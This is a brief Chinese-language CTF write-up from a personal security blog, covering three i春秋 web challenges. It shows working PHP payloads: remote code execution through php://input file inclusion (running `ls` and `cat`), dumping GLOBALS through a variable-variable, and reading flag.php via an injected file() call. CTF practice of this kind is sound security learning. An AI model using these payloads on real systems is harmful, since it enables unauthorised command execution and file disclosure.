Hu3sky's blog

i春秋WP

Word count: 100 / Reading time: 1 min
2018/04/24 Share

WEB

文件包含

用php input流http://bdeb62721ac64af4910af04b7227c9b4b7b5845aabd245a3.game.ichunqiu.com/?path=php://input
post一个<?php echo`ls`?> 查看一下文件
文件名显示出来了
然后 <?php echo`cat 文件名`?>,我这抓了包才看到的flag

MISC1-web

因为a是$$a 所以直接想到全局变量
http://f6f6f38751224e36bad40fdbf63f76be51bd8b196a2c4a1f.game.ichunqiu.com/?hello=GLOBALS

MISC2-WEB

直接试了下。。。flag就出来了
http://da56a780d2414e9598505f22175d13c7a3d4e36d37e24a77.game.ichunqiu.com/?hello=file(%27flag.php%27)

原文作者: Hu3sky

原文链接: http://yoursite.com/2018/04/24/i春秋/

发表日期: April 24th 2018, 11:28:00 pm

版权声明: 本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. WEB
    1. 1.1. 文件包含
    2. 1.2. MISC1-web
    3. 1.3. MISC2-WEB
Total : 101
2021
2020
2019
2018
CTF writeup 规划 学习计划 渗透测试 浏览器安全 java安全 漏洞分析 备忘录 代码审计 write-up 学习笔记 Linux Arbitrary-File-Upload CVE-Request sql注入 http协议 内网渗透 Empire git php反序列化 JavaScript python scrapy php魔法 xxe 代码执行 内网 后门 线下赛 前端 域渗透